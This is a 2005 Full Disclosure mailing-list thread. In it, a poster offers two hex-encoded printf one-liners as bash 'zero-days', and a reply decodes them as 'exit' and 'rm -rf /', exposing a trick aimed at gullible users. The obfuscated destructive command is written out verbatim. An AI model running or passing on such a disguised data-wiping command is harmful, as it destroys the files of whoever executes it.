Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Re: Bash vulnerability?

From: Gilles DEMARTY <gilles.demarty () gmail com>
Date: Fri, 26 Aug 2005 17:28:49 +0200
Hi, themaster , 

\x65\x78\x69\x74\ means exit (considering ASCII representation of letters) .... 
and `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` does a rm -rf / ......
that's just a trick for people who don't know damn nothing about
computer, and bash...
it's even not worth replying this.

.......
no more comments

2005/8/26, Rootmaster G <th3r007m45t3r () hotmail com>:

I have for long time  been looking at a new bash zreod4y  that was sent to
me.  Having not time to calculate who this code works,and now it is with
this list

I have many times made bash to crash but cannot yet wrige and exploit for
this issue.

`printf "\x65\x78\x69\x74\x00\x0a"`

aslo I have found this other bash zerod4y from the same place that says

`printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`

both these vulnerabiilities must be run as root i find orf the second one
will not do what it thinks

can anyone help?

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: